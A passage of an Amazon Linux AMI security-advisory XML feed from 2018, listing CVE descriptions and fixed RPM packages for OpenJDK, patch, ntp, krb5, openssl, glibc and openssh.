Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: Security). Supported versions that are affected are Java SE: 6u181, 7u171, 8u162 and 10; Java SE Embedded: 8u161; JRockit: R28.3.17. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded, JRockit. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
1567351:
CVE-2018-2795 OpenJDK: insufficient consistency checks in deserialization of multiple classes (Security, 8189977)
CVE-2018-2794:
Vulnerability in the Java SE, JRockit component of Oracle Java SE (subcomponent: Security). Supported versions that are affected are Java SE: 6u181, 7u171, 8u162, 10 and JRockit: R28.3.17. Difficult to exploit vulnerability allows unauthenticated attacker with logon to the infrastructure where Java SE, JRockit executes to compromise Java SE, JRockit. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, JRockit, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE, JRockit. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 7.7 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H).
1567126:
CVE-2018-2794 OpenJDK: unrestricted deserialization of data from JCEKS key stores (Security, 8189997)
CVE-2018-2790:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Security). Supported versions that are affected are Java SE: 6u181, 7u171, 8u162 and 10; Java SE Embedded: 8u161. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 3.1 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N).
1568515:
CVE-2018-2790 OpenJDK: incorrect merging of sections in the JAR manifest (Security, 8189969)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2790" title="" id="CVE-2018-2790" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2794" title="" id="CVE-2018-2794" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2795" title="" id="CVE-2018-2795" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2796" title="" id="CVE-2018-2796" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2797" title="" id="CVE-2018-2797" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2798" title="" id="CVE-2018-2798" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2799" title="" id="CVE-2018-2799" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2800" title="" id="CVE-2018-2800" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2814" title="" id="CVE-2018-2814" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2815" title="" id="CVE-2018-2815" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.181" release="2.6.14.1.79.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.181-2.6.14.1.79.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.181" release="2.6.14.1.79.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.181-2.6.14.1.79.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.181" release="2.6.14.1.79.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.181-2.6.14.1.79.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.181" release="2.6.14.1.79.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.181-2.6.14.1.79.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.181" release="2.6.14.1.79.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.181-2.6.14.1.79.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.181" release="2.6.14.1.79.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.181-2.6.14.1.79.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.181" release="2.6.14.1.79.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.181-2.6.14.1.79.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.181" release="2.6.14.1.79.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.181-2.6.14.1.79.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.181" release="2.6.14.1.79.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.181-2.6.14.1.79.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.181" release="2.6.14.1.79.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.181-2.6.14.1.79.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.181" release="2.6.14.1.79.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.181-2.6.14.1.79.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1008</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1008: important priority package update for patch</title><issued date="2018-05-10 16:52:00" /><updated date="2018-05-10 23:29:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-1000156:
GNU Patch version 2.7.6 contains an input validation vulnerability when processing patch files, specifically the EDITOR_PROGRAM invocation (using ed) can result in code execution. This attack appear to be exploitable via a patch file processed via the patch utility. This is similar to FreeBSD&#039;s CVE-2015-1418 however although they share a common ancestry the code bases have diverged over time.
1564326:
CVE-2018-1000156 patch: Malicious patch files cause ed to execute arbitrary commands
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000156" title="" id="CVE-2018-1000156" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="patch" version="2.7.1" release="10.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/patch-2.7.1-10.10.amzn1.x86_64.rpm</filename></package><package name="patch-debuginfo" version="2.7.1" release="10.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/patch-debuginfo-2.7.1-10.10.amzn1.x86_64.rpm</filename></package><package name="patch-debuginfo" version="2.7.1" release="10.10.amzn1" epoch="0" arch="i686"><filename>Packages/patch-debuginfo-2.7.1-10.10.amzn1.i686.rpm</filename></package><package name="patch" version="2.7.1" release="10.10.amzn1" epoch="0" arch="i686"><filename>Packages/patch-2.7.1-10.10.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1009</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1009: medium priority package update for ntp</title><issued date="2018-05-10 17:01:00" /><updated date="2023-10-25 21:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-7185:
The protocol engine in ntp 4.2.6 before 4.2.8p11 allows a remote attackers to cause a denial of service (disruption) by continually sending a packet with a zero-origin timestamp and source IP address of the "other side" of an interleaved association causing the victim ntpd to reset its association.
CVE-2018-7184:
ntpd in ntp 4.2.8p4 before 4.2.8p11 drops bad packets before updating the "received" timestamp, which allows remote attackers to cause a denial of service (disruption) by sending a packet with a zero-origin timestamp causing the association to reset and setting the contents of the packet as the most recent timestamp. This issue is a result of an incomplete fix for CVE-2015-7704.
CVE-2018-7183:
Buffer overflow in the decodearr function in ntpq in ntp 4.2.8p6 through 4.2.8p10 allows remote attackers to execute arbitrary code by leveraging an ntpq query and sending a response with a crafted array.
CVE-2018-7182:
The ctl_getitem method in ntpd in ntp-4.2.8p6 before 4.2.8p11 allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted mode 6 packet with a ntpd instance from 4.2.8p6 through 4.2.8p10.
CVE-2018-7170:
A flaw was found in ntpd making it vulnerable to Sybil attacks. An authenticated attacker could target systems configured to use a trusted key in certain configurations and to create an arbitrary number of associations and subsequently modify a victim's clock.
CVE-2016-1549:
A malicious authenticated peer can create arbitrarily-many ephemeral associations in order to win the clock selection algorithm in ntpd in NTP 4.2.8p4 and earlier and NTPsec 3e160db8dc248a0bcb053b56a80167dc742d2b74 and a5fb34b9cc89b92a8fef2f459004865c93bb7f92 and modify a victim's clock.
CVE-2013-5211:
The monlist feature in ntp_request.c in ntpd in NTP before 4.2.7p26 allows remote attackers to cause a denial of service (traffic amplification) via forged (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests, as exploited in the wild in December 2013.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5211" title="" id="CVE-2013-5211" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1549" title="" id="CVE-2016-1549" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7170" title="" id="CVE-2018-7170" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7182" title="" id="CVE-2018-7182" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7183" title="" id="CVE-2018-7183" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7184" title="" id="CVE-2018-7184" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7185" title="" id="CVE-2018-7185" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ntpdate" version="4.2.8p11" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntpdate-4.2.8p11-1.37.amzn1.x86_64.rpm</filename></package><package name="ntp" version="4.2.8p11" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntp-4.2.8p11-1.37.amzn1.x86_64.rpm</filename></package><package name="ntp-doc" version="4.2.8p11" release="1.37.amzn1" epoch="0" arch="noarch"><filename>Packages/ntp-doc-4.2.8p11-1.37.amzn1.noarch.rpm</filename></package><package name="ntp-debuginfo" version="4.2.8p11" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntp-debuginfo-4.2.8p11-1.37.amzn1.x86_64.rpm</filename></package><package name="ntp-perl" version="4.2.8p11" release="1.37.amzn1" epoch="0" arch="noarch"><filename>Packages/ntp-perl-4.2.8p11-1.37.amzn1.noarch.rpm</filename></package><package name="ntpdate" version="4.2.8p11" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/ntpdate-4.2.8p11-1.37.amzn1.i686.rpm</filename></package><package name="ntp" version="4.2.8p11" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/ntp-4.2.8p11-1.37.amzn1.i686.rpm</filename></package><package name="ntp-debuginfo" version="4.2.8p11" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/ntp-debuginfo-4.2.8p11-1.37.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1010</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1010: medium priority package update for krb5</title><issued date="2018-09-05 19:27:00" /><updated date="2018-09-06 21:59:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-7562:
An authentication bypass flaw was found in the way krb5&#039;s certauth interface handled the validation of client certificates. A remote attacker able to communicate with the KDC could potentially use this flaw to impersonate arbitrary principals under rare and erroneous circumstances.
1485510:
CVE-2017-7562 krb5: Authentication bypass by improper validation of certificate EKU and SAN
CVE-2017-11368:
A denial of service flaw was found in MIT Kerberos krb5kdc service. An authenticated attacker could use this flaw to cause krb5kdc to exit with an assertion failure by making an invalid S4U2Self or S4U2Proxy request.
1473560:
CVE-2017-11368 krb5: Invalid S4U2Self or S4U2Proxy request causes assertion failure
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11368" title="" id="CVE-2017-11368" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7562" title="" id="CVE-2017-7562" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="krb5-devel" version="1.15.1" release="19.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-devel-1.15.1-19.43.amzn1.x86_64.rpm</filename></package><package name="krb5-server" version="1.15.1" release="19.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-server-1.15.1-19.43.amzn1.x86_64.rpm</filename></package><package name="krb5-debuginfo" version="1.15.1" release="19.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-debuginfo-1.15.1-19.43.amzn1.x86_64.rpm</filename></package><package name="krb5-workstation" version="1.15.1" release="19.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-workstation-1.15.1-19.43.amzn1.x86_64.rpm</filename></package><package name="krb5-libs" version="1.15.1" release="19.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-libs-1.15.1-19.43.amzn1.x86_64.rpm</filename></package><package name="krb5-pkinit-openssl" version="1.15.1" release="19.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-pkinit-openssl-1.15.1-19.43.amzn1.x86_64.rpm</filename></package><package name="libkadm5" version="1.15.1" release="19.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/libkadm5-1.15.1-19.43.amzn1.x86_64.rpm</filename></package><package name="krb5-server-ldap" version="1.15.1" release="19.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-server-ldap-1.15.1-19.43.amzn1.x86_64.rpm</filename></package><package name="krb5-debuginfo" version="1.15.1" release="19.43.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-debuginfo-1.15.1-19.43.amzn1.i686.rpm</filename></package><package name="krb5-workstation" version="1.15.1" release="19.43.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-workstation-1.15.1-19.43.amzn1.i686.rpm</filename></package><package name="krb5-devel" version="1.15.1" release="19.43.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-devel-1.15.1-19.43.amzn1.i686.rpm</filename></package><package name="krb5-pkinit-openssl" version="1.15.1" release="19.43.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-pkinit-openssl-1.15.1-19.43.amzn1.i686.rpm</filename></package><package name="libkadm5" version="1.15.1" release="19.43.amzn1" epoch="0" arch="i686"><filename>Packages/libkadm5-1.15.1-19.43.amzn1.i686.rpm</filename></package><package name="krb5-libs" version="1.15.1" release="19.43.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-libs-1.15.1-19.43.amzn1.i686.rpm</filename></package><package name="krb5-server" version="1.15.1" release="19.43.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-server-1.15.1-19.43.amzn1.i686.rpm</filename></package><package name="krb5-server-ldap" version="1.15.1" release="19.43.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-server-ldap-1.15.1-19.43.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1016</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1016: medium priority package update for openssl</title><issued date="2018-05-10 17:29:00" /><updated date="2018-05-10 23:35:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-3738:
There is an overflow bug in the AVX2 Montgomery multiplication procedure used in exponentiation with 1024-bit moduli. No EC algorithms are affected. Analysis suggests that attacks against RSA and DSA as a result of this defect would be very difficult to perform and are not believed likely. Attacks against DH1024 are considered just feasible, because most of the work necessary to deduce information about a private key may be performed offline. The amount of resources required for such an attack would be significant. However, for an attack on TLS to be meaningful, the server would have to share the DH1024 private key among multiple clients, which is no longer an option since CVE-2016-0701. This only affects processors that support the AVX2 but not ADX extensions like Intel Haswell (4th generation). Note: The impact from this issue is similar to CVE-2017-3736, CVE-2017-3732 and CVE-2015-3193. OpenSSL version 1.0.2-1.0.2m and 1.1.0-1.1.0g are affected. Fixed in OpenSSL 1.0.2n. Due to the low severity of this issue we are not issuing a new release of OpenSSL 1.1.0 at this time. The fix will be included in OpenSSL 1.1.0h when it becomes available. The fix is also available in commit e502cc86d in the OpenSSL git repository.
1523510:
CVE-2017-3738 openssl: rsaz_1024_mul_avx2 overflow bug on x86_64
CVE-2017-3737:
OpenSSL 1.0.2 (starting from version 1.0.2b) introduced an &quot;error state&quot; mechanism. The intent was that if a fatal error occurred during a handshake then OpenSSL would move into the error state and would immediately fail if you attempted to continue the handshake. This works as designed for the explicit handshake functions (SSL_do_handshake(), SSL_accept() and SSL_connect()), however due to a bug it does not work correctly if SSL_read() or SSL_write() is called directly. In that scenario, if the handshake fails then a fatal error will be returned in the initial function call. If SSL_read()/SSL_write() is subsequently called by the application for the same SSL object then it will succeed and the data is passed without being decrypted/encrypted directly from the SSL/TLS record layer. In order to exploit this issue an application bug would have to be present that resulted in a call to SSL_read()/SSL_write() being issued after having already received a fatal error. OpenSSL version 1.0.2b-1.0.2m are affected. Fixed in OpenSSL 1.0.2n. OpenSSL 1.1.0 is not affected.
1523504:
CVE-2017-3737 openssl: Read/write after SSL object in error state
CVE-2017-3736:
There is a carry propagating bug in the x86_64 Montgomery squaring procedure in OpenSSL before 1.0.2m and 1.1.0 before 1.1.0g. No EC algorithms are affected. Analysis suggests that attacks against RSA and DSA as a result of this defect would be very difficult to perform and are not believed likely. Attacks against DH are considered just feasible (although very difficult) because most of the work necessary to deduce information about a private key may be performed offline. The amount of resources required for such an attack would be very significant and likely only accessible to a limited number of attackers. An attacker would additionally need online access to an unpatched system using the target private key in a scenario with persistent DH parameters and a private key that is shared between multiple clients. This only affects processors that support the BMI1, BMI2 and ADX extensions like Intel Broadwell (5th generation) and later or AMD Ryzen.
1509169:
CVE-2017-3736 openssl: bn_sqrx8x_internal carry bug on x86_64
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3736" title="" id="CVE-2017-3736" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3737" title="" id="CVE-2017-3737" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3738" title="" id="CVE-2017-3738" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl-static" version="1.0.2k" release="12.109.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.2k-12.109.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="12.109.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.2k-12.109.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.2k" release="12.109.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.2k-12.109.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="12.109.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.2k-12.109.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.2k" release="12.109.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.2k-12.109.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="12.109.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-devel-1.0.2k-12.109.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.2k" release="12.109.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-1.0.2k-12.109.amzn1.i686.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="12.109.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-debuginfo-1.0.2k-12.109.amzn1.i686.rpm</filename></package><package name="openssl-static" version="1.0.2k" release="12.109.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-static-1.0.2k-12.109.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.2k" release="12.109.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-perl-1.0.2k-12.109.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1017</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1017: important priority package update for glibc</title><issued date="2018-05-10 17:45:00" /><updated date="2018-05-10 23:38:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-1000001:
In glibc 2.26 and earlier there is confusion in the usage of getcwd() by realpath() which can be used to write before the destination buffer leading to a buffer underflow and potential code execution.
1533836:
CVE-2018-1000001 glibc: realpath() buffer underflow when getcwd() returns relative path allows privilege escalation
CVE-2017-15804:
The glob function in glob.c in the GNU C Library (aka glibc or libc6) before 2.27 contains a buffer overflow during unescaping of user names with the ~ operator.
1505298:
CVE-2017-15804 glibc: Buffer overflow during unescaping of user names with the ~ operator
CVE-2017-15670:
The GNU C Library (aka glibc or libc6) before 2.27 contains an off-by-one error leading to a heap-based buffer overflow in the glob function in glob.c, related to the processing of home directories using the ~ operator followed by a long string.
1504804:
CVE-2017-15670 glibc: Buffer overflow in glob with GLOB_TILDE
CVE-2017-12132:
The DNS stub resolver in the GNU C Library (aka glibc or libc6) before version 2.26, when EDNS support is enabled, will solicit large UDP responses from name servers, potentially simplifying off-path DNS spoofing attacks due to IP fragmentation.
1477529:
CVE-2017-12132 glibc: Fragmentation attacks possible when EDNS0 is enabled
CVE-2015-5180:
res_query in libresolv in glibc before 2.25 allows remote attackers to cause a denial of service (NULL pointer dereference and process crash).
1249603:
CVE-2015-5180 glibc: DNS resolver NULL pointer dereference with crafted record type
CVE-2014-9402:
The nss_dns implementation of getnetbyname in GNU C Library (aka glibc) before 2.21, when the DNS backend in the Name Service Switch configuration is enabled, allows remote attackers to cause a denial of service (infinite loop) by sending a positive answer while a network name is being process.
1175369:
CVE-2014-9402 glibc: denial of service in getnetbyname function
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9402" title="" id="CVE-2014-9402" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5180" title="" id="CVE-2015-5180" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12132" title="" id="CVE-2017-12132" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15670" title="" id="CVE-2017-15670" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15804" title="" id="CVE-2017-15804" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000001" title="" id="CVE-2018-1000001" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nscd" version="2.17" release="222.173.amzn1" epoch="0" arch="x86_64"><filename>Packages/nscd-2.17-222.173.amzn1.x86_64.rpm</filename></package><package name="glibc-common" version="2.17" release="222.173.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-common-2.17-222.173.amzn1.x86_64.rpm</filename></package><package name="glibc-utils" version="2.17" release="222.173.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-utils-2.17-222.173.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="222.173.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-2.17-222.173.amzn1.x86_64.rpm</filename></package><package name="glibc" version="2.17" release="222.173.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-2.17-222.173.amzn1.x86_64.rpm</filename></package><package name="glibc-static" version="2.17" release="222.173.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-static-2.17-222.173.amzn1.x86_64.rpm</filename></package><package name="glibc-devel" version="2.17" release="222.173.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-devel-2.17-222.173.amzn1.x86_64.rpm</filename></package><package name="glibc-headers" version="2.17" release="222.173.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-headers-2.17-222.173.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="222.173.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-common-2.17-222.173.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="222.173.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-common-2.17-222.173.amzn1.i686.rpm</filename></package><package name="glibc-static" version="2.17" release="222.173.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-static-2.17-222.173.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="222.173.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-2.17-222.173.amzn1.i686.rpm</filename></package><package name="glibc" version="2.17" release="222.173.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-2.17-222.173.amzn1.i686.rpm</filename></package><package name="glibc-devel" version="2.17" release="222.173.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-devel-2.17-222.173.amzn1.i686.rpm</filename></package><package name="glibc-utils" version="2.17" release="222.173.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-utils-2.17-222.173.amzn1.i686.rpm</filename></package><package name="nscd" version="2.17" release="222.173.amzn1" epoch="0" arch="i686"><filename>Packages/nscd-2.17-222.173.amzn1.i686.rpm</filename></package><package name="glibc-headers" version="2.17" release="222.173.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-headers-2.17-222.173.amzn1.i686.rpm</filename></package><package name="glibc-common" version="2.17" release="222.173.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-common-2.17-222.173.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1018</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1018: low priority package update for openssh</title><issued date="2018-05-10 17:51:00" /><updated date="2018-05-10 23:39:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-15906:
The process_open function in sftp-server.c in OpenSSH before 7.6 does not properly prevent write operations in readonly mode, which allows attackers to create zero-length files.
1506630:
CVE-2017-15906 openssh: Improper write operations in readonly mode allow for zero-length file creation
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15906" title="" id="CVE-2017-15906" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssh-cavs" version="7.4p1" release="16.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-cavs-7.4p1-16.69.amzn1.x86_64.rpm</filename></package><package name="openssh" version="7.4p1" release="16.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-7.4p1-16.69.amzn1.x86_64.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.10.3" release="2.16.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/pam_ssh_agent_auth-0.10.3-2.16.69.amzn1.x86_64.rpm</filename></package><package name="openssh-keycat" version="7.4p1" release="16.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-keycat-7.4p1-16.69.amzn1.x86_64.rpm</filename></package><package name="openssh-ldap" version="7.4p1" release="16.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-ldap-7.4p1-16.69.amzn1.x86_64.rpm</filename></package><package name="openssh-clients" version="7.4p1" release="16.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-clients-7.4p1-16.69.amzn1.x86_64.rpm</filename></package><package name="openssh-debuginfo" version="7.4p1" release="16.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-debuginfo-7.4p1-16.69.amzn1.x86_64.rpm</filename></package><package name="openssh-server" version="7.4p1" release="16.69.amzn1" epoch="0" 